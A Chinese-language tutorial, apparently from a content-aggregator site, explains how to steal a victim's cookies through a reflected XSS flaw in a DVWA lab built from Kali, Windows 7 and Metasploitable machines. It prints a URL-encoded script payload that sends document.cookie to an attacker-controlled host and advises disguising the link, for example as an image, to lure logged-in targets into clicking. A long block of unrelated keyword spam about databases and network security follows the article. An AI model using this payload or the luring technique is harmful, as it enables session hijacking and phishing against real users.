如何利用XSS漏洞获取对方cookie
发表于:2024-09-22 作者:千家信息网编辑
千家信息网最后更新 2024年09月22日,这篇文章主要讲解了"如何利用XSS漏洞获取对方cookie",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"如何利用XSS漏洞获取对方cookie"吧!(
千家信息网最后更新 2024年09月22日如何利用XSS漏洞获取对方cookie
这篇文章主要讲解了"如何利用XSS漏洞获取对方cookie",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"如何利用XSS漏洞获取对方cookie"吧!
(1)环境搭建
kali linux:192.168.80.136
目标win7: 192.168.80.130
Metasploitable:192.168.80.129
cookie接收脚本get.php(脚本在/var/www/html文件夹下,html文件夹权限777):
(2)XSS漏洞利用
目标登录metasploitable的DVWA,点击存在XSS漏洞的页面,输入如下代码后提交:
(3)查看cookie
切换到kali,直接查看cookie.txt内容,可以看到获得的cookie。
(4)进一步利用
目标提交后可以在地址栏看到如下URL:
http://192.168.80.129/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Enew+Image%28%29.src%3D%22http%3A%2F%2F192.168.80.136%2Fget.php%3Fcookie%3D%22%2B[xss_clean]%3B%3C%2Fscript%3E#
可以将以上URL伪装成其他形式(如图片),诱使目标点击,在目标已登录的情况下,可以达到同样获取cookie的效果。
感谢各位的阅读,以上就是"如何利用XSS漏洞获取对方cookie"的内容了,经过本文的学习后,相信大家对如何利用XSS漏洞获取对方cookie这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是,小编将为大家推送更多相关知识点的文章,欢迎关注!
漏洞
目标
对方
内容
学习
情况
文件
文件夹
脚本
登录
代码
图片
地址
就是
形式
思路
效果
文章
更多
权限
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
网络安全从我做起手抄报四年级
绵阳软件开发行业标准
应用软件开发商家
统信系统安装神舟通用数据库
北京熹旺成品网络技术有限公司
软件开发 项目经理制度
软件开发行业风险分析图
电脑app连接不上服务器
profile 数据库
维护网络安全 感知
弹性web服务器托管的稳定性
方舟生存进化服务器如何自己建
软件开发项目科研经费
ARM服务器与国产化
网络安全涉及的内容分为
dev c 软件开发
网络安全知识大赛理论知识
access数据库功能
上海网络安全保护总队
hp服务器 固态硬盘
移动互联网科技的作用
网络安全体验服务
北京做直销软件开发
构筑网络安全屏障
java 数据库公共类
方舟生存进化进服务器花钱吗
网络安全志愿者投票
网络安全审计系统一般不包括
apps软件开发
斯威变频器服务器怎么查故障